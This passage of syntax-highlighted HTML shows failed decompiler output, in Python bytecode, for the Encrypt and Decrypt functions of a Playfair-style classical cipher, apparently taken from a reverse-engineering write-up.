class="built_in">range</span>(<span class="built_in">len</span>(T_letter)):</span><br><span class="line"> <span class="keyword">if</span> ch == T_letter[i][j]:</span><br><span class="line"> <span class="keyword">return</span> (</span><br><span class="line"> i, j)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">Encrypt</span>--- <span class="title">This</span> <span class="title">code</span> <span class="title">section</span> <span class="title">failed</span>:</span> 
---</span><br><span class="line"></span><br><span class="line"> L. <span class="number">44</span> <span class="number">0</span> LOAD_STR <span class="string">''</span></span><br><span class="line"> <span class="number">2</span> STORE_FAST <span class="string">'ciphertext'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">46</span> <span class="number">4</span> LOAD_GLOBAL <span class="built_in">len</span></span><br><span class="line"> <span class="number">6</span> LOAD_FAST <span class="string">'plaintext'</span></span><br><span class="line"> <span class="number">8</span> CALL_FUNCTION_1 <span class="number">1</span> <span class="string">''</span></span><br><span class="line"> <span class="number">10</span> LOAD_CONST <span class="number">2</span></span><br><span class="line"> <span class="number">12</span> BINARY_MODULO </span><br><span class="line"> <span class="number">14</span> LOAD_CONST <span class="number">0</span></span><br><span class="line"> <span class="number">16</span> COMPARE_OP !=</span><br><span class="line"> <span class="number">18</span> POP_JUMP_IF_FALSE <span class="number">28</span> <span class="string">'to 28'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">47</span> <span class="number">20</span> LOAD_FAST <span class="string">'plaintext'</span></span><br><span class="line"> <span class="number">22</span> LOAD_STR <span class="string">'Z'</span></span><br><span class="line"> <span class="number">24</span> INPLACE_ADD </span><br><span class="line"> <span class="number">26</span> STORE_FAST <span class="string">'plaintext'</span></span><br><span class="line"> <span class="number">28_0</span> COME_FROM <span class="number">18</span> <span class="string">'18'</span></span><br><span class="line"></span><br><span class="line"> L. 
<span class="number">49</span> <span class="number">28</span> LOAD_CONST <span class="number">0</span></span><br><span class="line"> <span class="number">30</span> STORE_FAST <span class="string">'i'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">50</span> <span class="number">32</span> LOAD_FAST <span class="string">'i'</span></span><br><span class="line"> <span class="number">34</span> LOAD_GLOBAL <span class="built_in">len</span></span><br><span class="line"> <span class="number">36</span> LOAD_FAST <span class="string">'plaintext'</span></span><br><span class="line"> <span class="number">38</span> CALL_FUNCTION_1 <span class="number">1</span> <span class="string">''</span></span><br><span class="line"> <span class="number">40</span> COMPARE_OP <</span><br><span class="line"> <span class="number">42_44</span> POP_JUMP_IF_FALSE <span class="number">440</span> <span class="string">'to 440'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">51</span> <span class="number">46</span> LOAD_CONST <span class="literal">True</span></span><br><span class="line"> <span class="number">48</span> LOAD_FAST <span class="string">'plaintext'</span></span><br><span class="line"> <span class="number">50</span> LOAD_FAST <span class="string">'i'</span></span><br><span class="line"> <span class="number">52</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">54</span> LOAD_METHOD isalpha</span><br><span class="line"> <span class="number">56</span> CALL_METHOD_0 <span class="number">0</span> <span class="string">''</span></span><br><span class="line"> <span class="number">58</span> COMPARE_OP ==</span><br><span class="line"> <span class="number">60_62</span> POP_JUMP_IF_FALSE <span class="number">418</span> <span class="string">'to 418'</span></span><br><span class="line"></span><br><span class="line"> L. 
<span class="number">52</span> <span class="number">64</span> LOAD_FAST <span class="string">'i'</span></span><br><span class="line"> <span class="number">66</span> LOAD_CONST <span class="number">1</span></span><br><span class="line"> <span class="number">68</span> BINARY_ADD </span><br><span class="line"> <span class="number">70</span> STORE_FAST <span class="string">'j'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">53</span> <span class="number">72</span> LOAD_FAST <span class="string">'j'</span></span><br><span class="line"> <span class="number">74</span> LOAD_GLOBAL <span class="built_in">len</span></span><br><span class="line"> <span class="number">76</span> LOAD_FAST <span class="string">'plaintext'</span></span><br><span class="line"> <span class="number">78</span> CALL_FUNCTION_1 <span class="number">1</span> <span class="string">''</span></span><br><span class="line"> <span class="number">80</span> COMPARE_OP <</span><br><span class="line"> <span class="number">82_84</span> POP_JUMP_IF_FALSE <span class="number">406</span> <span class="string">'to 406'</span></span><br><span class="line"></span><br><span class="line"> L. 
<span class="number">54</span> <span class="number">86</span> LOAD_CONST <span class="literal">True</span></span><br><span class="line"> <span class="number">88</span> LOAD_FAST <span class="string">'plaintext'</span></span><br><span class="line"> <span class="number">90</span> LOAD_FAST <span class="string">'j'</span></span><br><span class="line"> <span class="number">92</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">94</span> LOAD_METHOD isalpha</span><br><span class="line"> <span class="number">96</span> CALL_METHOD_0 <span class="number">0</span> <span class="string">''</span></span><br><span class="line"> <span class="number">98</span> COMPARE_OP ==</span><br><span class="line"> <span class="number">100_102</span> POP_JUMP_IF_FALSE <span class="number">396</span> <span class="string">'to 396'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">55</span> <span class="number">104</span> LOAD_STR <span class="string">'I'</span></span><br><span class="line"> <span class="number">106</span> LOAD_FAST <span class="string">'plaintext'</span></span><br><span class="line"> <span class="number">108</span> LOAD_FAST <span class="string">'i'</span></span><br><span class="line"> <span class="number">110</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">112</span> LOAD_METHOD upper</span><br><span class="line"> <span class="number">114</span> CALL_METHOD_0 <span class="number">0</span> <span class="string">''</span></span><br><span class="line"> <span class="number">116</span> COMPARE_OP ==</span><br><span class="line"> <span class="number">118</span> POP_JUMP_IF_FALSE <span class="number">130</span> <span class="string">'to 130'</span></span><br><span class="line"></span><br><span class="line"> L. 
<span class="number">56</span> <span class="number">120</span> LOAD_GLOBAL Get_MatrixIndex</span><br><span class="line"> <span class="number">122</span> LOAD_STR <span class="string">'J'</span></span><br><span class="line"> <span class="number">124</span> CALL_FUNCTION_1 <span class="number">1</span> <span class="string">''</span></span><br><span class="line"> <span class="number">126</span> STORE_FAST <span class="string">'x'</span></span><br><span class="line"> <span class="number">128</span> JUMP_FORWARD <span class="number">146</span> <span class="string">'to 146'</span></span><br><span class="line"> <span class="number">130_0</span> COME_FROM <span class="number">118</span> <span class="string">'118'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">58</span> <span class="number">130</span> LOAD_GLOBAL Get_MatrixIndex</span><br><span class="line"></span><br><span class="line"> L. <span class="number">59</span> <span class="number">132</span> LOAD_FAST <span class="string">'plaintext'</span></span><br><span class="line"> <span class="number">134</span> LOAD_FAST <span class="string">'i'</span></span><br><span class="line"> <span class="number">136</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">138</span> LOAD_METHOD upper</span><br><span class="line"> <span class="number">140</span> CALL_METHOD_0 <span class="number">0</span> <span class="string">''</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">58</span> <span class="number">142</span> CALL_FUNCTION_1 <span class="number">1</span> <span class="string">''</span></span><br><span class="line"> <span class="number">144</span> STORE_FAST <span class="string">'x'</span></span><br><span class="line"> <span class="number">146_0</span> COME_FROM <span class="number">128</span> <span class="string">'128'</span></span><br><span class="line"></span><br><span class="line"> L. 
<span class="number">60</span> <span class="number">146</span> LOAD_STR <span class="string">'I'</span></span><br><span class="line"> <span class="number">148</span> LOAD_FAST <span class="string">'plaintext'</span></span><br><span class="line"> <span class="number">150</span> LOAD_FAST <span class="string">'j'</span></span><br><span class="line"> <span class="number">152</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">154</span> LOAD_METHOD upper</span><br><span class="line"> <span class="number">156</span> CALL_METHOD_0 <span class="number">0</span> <span class="string">''</span></span><br><span class="line"> <span class="number">158</span> COMPARE_OP ==</span><br><span class="line"> <span class="number">160</span> POP_JUMP_IF_FALSE <span class="number">172</span> <span class="string">'to 172'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">61</span> <span class="number">162</span> LOAD_GLOBAL Get_MatrixIndex</span><br><span class="line"> <span class="number">164</span> LOAD_STR <span class="string">'J'</span></span><br><span class="line"> <span class="number">166</span> CALL_FUNCTION_1 <span class="number">1</span> <span class="string">''</span></span><br><span class="line"> <span class="number">168</span> STORE_FAST <span class="string">'y'</span></span><br><span class="line"> <span class="number">170</span> JUMP_FORWARD <span class="number">188</span> <span class="string">'to 188'</span></span><br><span class="line"> <span class="number">172_0</span> COME_FROM <span class="number">160</span> <span class="string">'160'</span></span><br><span class="line"></span><br><span class="line"> L. 
<span class="number">63</span> <span class="number">172</span> LOAD_GLOBAL Get_MatrixIndex</span><br><span class="line"> <span class="number">174</span> LOAD_FAST <span class="string">'plaintext'</span></span><br><span class="line"> <span class="number">176</span> LOAD_FAST <span class="string">'j'</span></span><br><span class="line"> <span class="number">178</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">180</span> LOAD_METHOD upper</span><br><span class="line"> <span class="number">182</span> CALL_METHOD_0 <span class="number">0</span> <span class="string">''</span></span><br><span class="line"> <span class="number">184</span> CALL_FUNCTION_1 <span class="number">1</span> <span class="string">''</span></span><br><span class="line"> <span class="number">186</span> STORE_FAST <span class="string">'y'</span></span><br><span class="line"> <span class="number">188_0</span> COME_FROM <span class="number">170</span> <span class="string">'170'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">65</span> <span class="number">188</span> LOAD_FAST <span class="string">'x'</span></span><br><span class="line"> <span class="number">190</span> LOAD_CONST <span class="number">0</span></span><br><span class="line"> <span class="number">192</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">194</span> LOAD_FAST <span class="string">'y'</span></span><br><span class="line"> <span class="number">196</span> LOAD_CONST <span class="number">0</span></span><br><span class="line"> <span class="number">198</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">200</span> COMPARE_OP ==</span><br><span class="line"> <span class="number">202_204</span> POP_JUMP_IF_FALSE <span class="number">268</span> <span class="string">'to 268'</span></span><br><span class="line"></span><br><span class="line"> L. 
<span class="number">66</span> <span class="number">206</span> LOAD_FAST <span class="string">'ciphertext'</span></span><br><span class="line"> <span class="number">208</span> LOAD_FAST <span class="string">'T_letter'</span></span><br><span class="line"> <span class="number">210</span> LOAD_FAST <span class="string">'x'</span></span><br><span class="line"> <span class="number">212</span> LOAD_CONST <span class="number">0</span></span><br><span class="line"> <span class="number">214</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">216</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">218</span> LOAD_FAST <span class="string">'x'</span></span><br><span class="line"> <span class="number">220</span> LOAD_CONST <span class="number">1</span></span><br><span class="line"> <span class="number">222</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">224</span> LOAD_CONST <span class="number">1</span></span><br><span class="line"> <span class="number">226</span> BINARY_ADD </span><br><span class="line"></span><br><span class="line"> L. <span class="number">67</span> <span class="number">228</span> LOAD_CONST <span class="number">5</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">66</span> <span class="number">230</span> BINARY_MODULO </span><br><span class="line"> <span class="number">232</span> BINARY_SUBSCR </span><br><span class="line"></span><br><span class="line"> L. 
<span class="number">67</span> <span class="number">234</span> LOAD_FAST <span class="string">'T_letter'</span></span><br><span class="line"> <span class="number">236</span> LOAD_FAST <span class="string">'y'</span></span><br><span class="line"> <span class="number">238</span> LOAD_CONST <span class="number">0</span></span><br><span class="line"> <span class="number">240</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">242</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">244</span> LOAD_FAST <span class="string">'y'</span></span><br><span class="line"> <span class="number">246</span> LOAD_CONST <span class="number">1</span></span><br><span class="line"> <span class="number">248</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">250</span> LOAD_CONST <span class="number">1</span></span><br><span class="line"> <span class="number">252</span> BINARY_ADD </span><br><span class="line"> <span class="number">254</span> LOAD_CONST <span class="number">5</span></span><br><span class="line"> <span class="number">256</span> BINARY_MODULO </span><br><span class="line"> <span class="number">258</span> BINARY_SUBSCR </span><br><span class="line"></span><br><span class="line"> L. <span class="number">66</span> <span class="number">260</span> BINARY_ADD </span><br><span class="line"> <span class="number">262</span> INPLACE_ADD </span><br><span class="line"> <span class="number">264</span> STORE_FAST <span class="string">'ciphertext'</span></span><br><span class="line"> <span class="number">266</span> JUMP_ABSOLUTE <span class="number">406</span> <span class="string">'to 406'</span></span><br><span class="line"> <span class="number">268_0</span> COME_FROM <span class="number">202</span> <span class="string">'202'</span></span><br><span class="line"></span><br><span class="line"> L. 
<span class="number">68</span> <span class="number">268</span> LOAD_FAST <span class="string">'x'</span></span><br><span class="line"> <span class="number">270</span> LOAD_CONST <span class="number">1</span></span><br><span class="line"> <span class="number">272</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">274</span> LOAD_FAST <span class="string">'y'</span></span><br><span class="line"> <span class="number">276</span> LOAD_CONST <span class="number">1</span></span><br><span class="line"> <span class="number">278</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">280</span> COMPARE_OP ==</span><br><span class="line"> <span class="number">282_284</span> POP_JUMP_IF_FALSE <span class="number">348</span> <span class="string">'to 348'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">69</span> <span class="number">286</span> LOAD_FAST <span class="string">'ciphertext'</span></span><br><span class="line"> <span class="number">288</span> LOAD_FAST <span class="string">'T_letter'</span></span><br><span class="line"> <span class="number">290</span> LOAD_FAST <span class="string">'x'</span></span><br><span class="line"> <span class="number">292</span> LOAD_CONST <span class="number">1</span></span><br><span class="line"> <span class="number">294</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">296</span> LOAD_CONST <span class="number">1</span></span><br><span class="line"> <span class="number">298</span> BINARY_ADD </span><br><span class="line"></span><br><span class="line"> L. <span class="number">70</span> <span class="number">300</span> LOAD_CONST <span class="number">5</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">69</span> <span class="number">302</span> BINARY_MODULO </span><br><span class="line"> <span class="number">304</span> BINARY_SUBSCR </span><br><span class="line"></span><br><span class="line"> L. 
<span class="number">70</span> <span class="number">306</span> LOAD_FAST <span class="string">'x'</span></span><br><span class="line"> <span class="number">308</span> LOAD_CONST <span class="number">0</span></span><br><span class="line"> <span class="number">310</span> BINARY_SUBSCR </span><br><span class="line"></span><br><span class="line"> L. <span class="number">69</span> <span class="number">312</span> BINARY_SUBSCR </span><br><span class="line"></span><br><span class="line"> L. <span class="number">70</span> <span class="number">314</span> LOAD_FAST <span class="string">'T_letter'</span></span><br><span class="line"> <span class="number">316</span> LOAD_FAST <span class="string">'y'</span></span><br><span class="line"> <span class="number">318</span> LOAD_CONST <span class="number">1</span></span><br><span class="line"> <span class="number">320</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">322</span> LOAD_CONST <span class="number">1</span></span><br><span class="line"> <span class="number">324</span> BINARY_ADD </span><br><span class="line"> <span class="number">326</span> LOAD_CONST <span class="number">5</span></span><br><span class="line"> <span class="number">328</span> BINARY_MODULO </span><br><span class="line"> <span class="number">330</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">332</span> LOAD_FAST <span class="string">'y'</span></span><br><span class="line"> <span class="number">334</span> LOAD_CONST <span class="number">0</span></span><br><span class="line"> <span class="number">336</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">338</span> BINARY_SUBSCR </span><br><span class="line"></span><br><span class="line"> L. 
<span class="number">69</span> <span class="number">340</span> BINARY_ADD </span><br><span class="line"> <span class="number">342</span> INPLACE_ADD </span><br><span class="line"> <span class="number">344</span> STORE_FAST <span class="string">'ciphertext'</span></span><br><span class="line"> <span class="number">346</span> JUMP_ABSOLUTE <span class="number">406</span> <span class="string">'to 406'</span></span><br><span class="line"> <span class="number">348_0</span> COME_FROM <span class="number">282</span> <span class="string">'282'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">72</span> <span class="number">348</span> LOAD_FAST <span class="string">'ciphertext'</span></span><br><span class="line"> <span class="number">350</span> LOAD_FAST <span class="string">'T_letter'</span></span><br><span class="line"> <span class="number">352</span> LOAD_FAST <span class="string">'x'</span></span><br><span class="line"> <span class="number">354</span> LOAD_CONST <span class="number">0</span></span><br><span class="line"> <span class="number">356</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">358</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">360</span> LOAD_FAST <span class="string">'y'</span></span><br><span class="line"> <span class="number">362</span> LOAD_CONST <span class="number">1</span></span><br><span class="line"> <span class="number">364</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">366</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">368</span> LOAD_FAST <span class="string">'T_letter'</span></span><br><span class="line"> <span class="number">370</span> LOAD_FAST <span class="string">'y'</span></span><br><span class="line"> <span class="number">372</span> LOAD_CONST <span class="number">0</span></span><br><span class="line"> <span class="number">374</span> BINARY_SUBSCR </span><br><span class="line"> <span 
class="number">376</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">378</span> LOAD_FAST <span class="string">'x'</span></span><br><span class="line"> <span class="number">380</span> LOAD_CONST <span class="number">1</span></span><br><span class="line"> <span class="number">382</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">384</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">386</span> BINARY_ADD </span><br><span class="line"> <span class="number">388</span> INPLACE_ADD </span><br><span class="line"> <span class="number">390</span> STORE_FAST <span class="string">'ciphertext'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">73</span> <span class="number">392_394</span> BREAK_LOOP <span class="number">406</span> <span class="string">'to 406'</span></span><br><span class="line"> <span class="number">396_0</span> COME_FROM <span class="number">100</span> <span class="string">'100'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">74</span> <span class="number">396</span> LOAD_FAST <span class="string">'j'</span></span><br><span class="line"> <span class="number">398</span> LOAD_CONST <span class="number">1</span></span><br><span class="line"> <span class="number">400</span> INPLACE_ADD </span><br><span class="line"> <span class="number">402</span> STORE_FAST <span class="string">'j'</span></span><br><span class="line"> <span class="number">404</span> JUMP_BACK <span class="number">72</span> <span class="string">'to 72'</span></span><br><span class="line"> <span class="number">406_0</span> COME_FROM <span class="number">82</span> <span class="string">'82'</span></span><br><span class="line"></span><br><span class="line"> L. 
<span class="number">75</span> <span class="number">406</span> LOAD_FAST <span class="string">'j'</span></span><br><span class="line"> <span class="number">408</span> LOAD_CONST <span class="number">1</span></span><br><span class="line"> <span class="number">410</span> BINARY_ADD </span><br><span class="line"> <span class="number">412</span> STORE_FAST <span class="string">'i'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">76</span> <span class="number">414</span> JUMP_BACK <span class="number">32</span> <span class="string">'to 32'</span></span><br><span class="line"> <span class="number">416</span> JUMP_FORWARD <span class="number">430</span> <span class="string">'to 430'</span></span><br><span class="line"> <span class="number">418_0</span> COME_FROM <span class="number">60</span> <span class="string">'60'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">78</span> <span class="number">418</span> LOAD_FAST <span class="string">'ciphertext'</span></span><br><span class="line"> <span class="number">420</span> LOAD_FAST <span class="string">'plaintext'</span></span><br><span class="line"> <span class="number">422</span> LOAD_FAST <span class="string">'i'</span></span><br><span class="line"> <span class="number">424</span> BINARY_SUBSCR </span><br><span class="line"> <span class="number">426</span> INPLACE_ADD </span><br><span class="line"> <span class="number">428</span> STORE_FAST <span class="string">'ciphertext'</span></span><br><span class="line"> <span class="number">430_0</span> COME_FROM <span class="number">416</span> <span class="string">'416'</span></span><br><span class="line"></span><br><span class="line"> L. 
<span class="number">79</span> <span class="number">430</span> LOAD_FAST <span class="string">'i'</span></span><br><span class="line"> <span class="number">432</span> LOAD_CONST <span class="number">1</span></span><br><span class="line"> <span class="number">434</span> INPLACE_ADD </span><br><span class="line"> <span class="number">436</span> STORE_FAST <span class="string">'i'</span></span><br><span class="line"> <span class="number">438</span> JUMP_BACK <span class="number">32</span> <span class="string">'to 32'</span></span><br><span class="line"> <span class="number">440_0</span> COME_FROM <span class="number">42</span> <span class="string">'42'</span></span><br><span class="line"></span><br><span class="line"> L. <span class="number">81</span> <span class="number">440</span> LOAD_FAST <span class="string">'ciphertext'</span></span><br><span class="line"> <span class="number">442</span> RETURN_VALUE </span><br><span class="line"> -<span class="number">1</span> RETURN_LAST </span><br><span class="line"></span><br><span class="line">Parse error at <span class="keyword">or</span> near `JUMP_FORWARD<span class="string">' instruction at offset 416</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">def Decrypt--- This code section failed: ---</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 87 0 LOAD_STR '</span><span class="string">'</span></span><br><span class="line"><span class="string"> 2 STORE_FAST '</span>plaintext<span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 
88 4 LOAD_GLOBAL len</span></span><br><span class="line"><span class="string"> 6 LOAD_FAST '</span>ciphertext<span class="string">'</span></span><br><span class="line"><span class="string"> 8 CALL_FUNCTION_1 1 '</span><span class="string">'</span></span><br><span class="line"><span class="string"> 10 LOAD_CONST 2</span></span><br><span class="line"><span class="string"> 12 BINARY_MODULO </span></span><br><span class="line"><span class="string"> 14 LOAD_CONST 0</span></span><br><span class="line"><span class="string"> 16 COMPARE_OP !=</span></span><br><span class="line"><span class="string"> 18 POP_JUMP_IF_FALSE 28 '</span>to <span class="number">28</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 89 20 LOAD_FAST '</span>ciphertext<span class="string">'</span></span><br><span class="line"><span class="string"> 22 LOAD_STR '</span>Z<span class="string">'</span></span><br><span class="line"><span class="string"> 24 INPLACE_ADD </span></span><br><span class="line"><span class="string"> 26 STORE_FAST '</span>ciphertext<span class="string">'</span></span><br><span class="line"><span class="string"> 28_0 COME_FROM 18 '</span><span class="number">18</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 91 28 LOAD_CONST 0</span></span><br><span class="line"><span class="string"> 30 STORE_FAST '</span>i<span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 
92 32 LOAD_FAST '</span>i<span class="string">'</span></span><br><span class="line"><span class="string"> 34 LOAD_GLOBAL len</span></span><br><span class="line"><span class="string"> 36 LOAD_FAST '</span>ciphertext<span class="string">'</span></span><br><span class="line"><span class="string"> 38 CALL_FUNCTION_1 1 '</span><span class="string">'</span></span><br><span class="line"><span class="string"> 40 COMPARE_OP <</span></span><br><span class="line"><span class="string"> 42_44 POP_JUMP_IF_FALSE 440 '</span>to <span class="number">440</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 93 46 LOAD_CONST True</span></span><br><span class="line"><span class="string"> 48 LOAD_FAST '</span>ciphertext<span class="string">'</span></span><br><span class="line"><span class="string"> 50 LOAD_FAST '</span>i<span class="string">'</span></span><br><span class="line"><span class="string"> 52 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 54 LOAD_METHOD isalpha</span></span><br><span class="line"><span class="string"> 56 CALL_METHOD_0 0 '</span><span class="string">'</span></span><br><span class="line"><span class="string"> 58 COMPARE_OP ==</span></span><br><span class="line"><span class="string"> 60_62 POP_JUMP_IF_FALSE 418 '</span>to <span class="number">418</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 94 64 LOAD_FAST '</span>i<span class="string">'</span></span><br><span class="line"><span class="string"> 66 LOAD_CONST 1</span></span><br><span class="line"><span class="string"> 68 BINARY_ADD </span></span><br><span class="line"><span class="string"> 70 STORE_FAST '</span>j<span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 
95 72 LOAD_FAST '</span>j<span class="string">'</span></span><br><span class="line"><span class="string"> 74 LOAD_GLOBAL len</span></span><br><span class="line"><span class="string"> 76 LOAD_FAST '</span>ciphertext<span class="string">'</span></span><br><span class="line"><span class="string"> 78 CALL_FUNCTION_1 1 '</span><span class="string">'</span></span><br><span class="line"><span class="string"> 80 COMPARE_OP <</span></span><br><span class="line"><span class="string"> 82_84 POP_JUMP_IF_FALSE 406 '</span>to <span class="number">406</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 96 86 LOAD_CONST True</span></span><br><span class="line"><span class="string"> 88 LOAD_FAST '</span>ciphertext<span class="string">'</span></span><br><span class="line"><span class="string"> 90 LOAD_FAST '</span>j<span class="string">'</span></span><br><span class="line"><span class="string"> 92 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 94 LOAD_METHOD isalpha</span></span><br><span class="line"><span class="string"> 96 CALL_METHOD_0 0 '</span><span class="string">'</span></span><br><span class="line"><span class="string"> 98 COMPARE_OP ==</span></span><br><span class="line"><span class="string"> 100_102 POP_JUMP_IF_FALSE 396 '</span>to <span class="number">396</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 
97 104 LOAD_STR '</span>I<span class="string">'</span></span><br><span class="line"><span class="string"> 106 LOAD_FAST '</span>ciphertext<span class="string">'</span></span><br><span class="line"><span class="string"> 108 LOAD_FAST '</span>i<span class="string">'</span></span><br><span class="line"><span class="string"> 110 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 112 LOAD_METHOD upper</span></span><br><span class="line"><span class="string"> 114 CALL_METHOD_0 0 '</span><span class="string">'</span></span><br><span class="line"><span class="string"> 116 COMPARE_OP ==</span></span><br><span class="line"><span class="string"> 118 POP_JUMP_IF_FALSE 130 '</span>to <span class="number">130</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 98 120 LOAD_GLOBAL Get_MatrixIndex</span></span><br><span class="line"><span class="string"> 122 LOAD_STR '</span>J<span class="string">'</span></span><br><span class="line"><span class="string"> 124 CALL_FUNCTION_1 1 '</span><span class="string">'</span></span><br><span class="line"><span class="string"> 126 STORE_FAST '</span>x<span class="string">'</span></span><br><span class="line"><span class="string"> 128 JUMP_FORWARD 146 '</span>to <span class="number">146</span><span class="string">'</span></span><br><span class="line"><span class="string"> 130_0 COME_FROM 118 '</span><span class="number">118</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 100 130 LOAD_GLOBAL Get_MatrixIndex</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 
101 132 LOAD_FAST '</span>ciphertext<span class="string">'</span></span><br><span class="line"><span class="string"> 134 LOAD_FAST '</span>i<span class="string">'</span></span><br><span class="line"><span class="string"> 136 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 138 LOAD_METHOD upper</span></span><br><span class="line"><span class="string"> 140 CALL_METHOD_0 0 '</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 100 142 CALL_FUNCTION_1 1 '</span><span class="string">'</span></span><br><span class="line"><span class="string"> 144 STORE_FAST '</span>x<span class="string">'</span></span><br><span class="line"><span class="string"> 146_0 COME_FROM 128 '</span><span class="number">128</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 102 146 LOAD_STR '</span>I<span class="string">'</span></span><br><span class="line"><span class="string"> 148 LOAD_FAST '</span>ciphertext<span class="string">'</span></span><br><span class="line"><span class="string"> 150 LOAD_FAST '</span>j<span class="string">'</span></span><br><span class="line"><span class="string"> 152 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 154 LOAD_METHOD upper</span></span><br><span class="line"><span class="string"> 156 CALL_METHOD_0 0 '</span><span class="string">'</span></span><br><span class="line"><span class="string"> 158 COMPARE_OP ==</span></span><br><span class="line"><span class="string"> 160 POP_JUMP_IF_FALSE 172 '</span>to <span class="number">172</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 
103 162 LOAD_GLOBAL Get_MatrixIndex</span></span><br><span class="line"><span class="string"> 164 LOAD_STR '</span>J<span class="string">'</span></span><br><span class="line"><span class="string"> 166 CALL_FUNCTION_1 1 '</span><span class="string">'</span></span><br><span class="line"><span class="string"> 168 STORE_FAST '</span>y<span class="string">'</span></span><br><span class="line"><span class="string"> 170 JUMP_FORWARD 188 '</span>to <span class="number">188</span><span class="string">'</span></span><br><span class="line"><span class="string"> 172_0 COME_FROM 160 '</span><span class="number">160</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 105 172 LOAD_GLOBAL Get_MatrixIndex</span></span><br><span class="line"><span class="string"> 174 LOAD_FAST '</span>ciphertext<span class="string">'</span></span><br><span class="line"><span class="string"> 176 LOAD_FAST '</span>j<span class="string">'</span></span><br><span class="line"><span class="string"> 178 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 180 LOAD_METHOD upper</span></span><br><span class="line"><span class="string"> 182 CALL_METHOD_0 0 '</span><span class="string">'</span></span><br><span class="line"><span class="string"> 184 CALL_FUNCTION_1 1 '</span><span class="string">'</span></span><br><span class="line"><span class="string"> 186 STORE_FAST '</span>y<span class="string">'</span></span><br><span class="line"><span class="string"> 188_0 COME_FROM 170 '</span><span class="number">170</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 
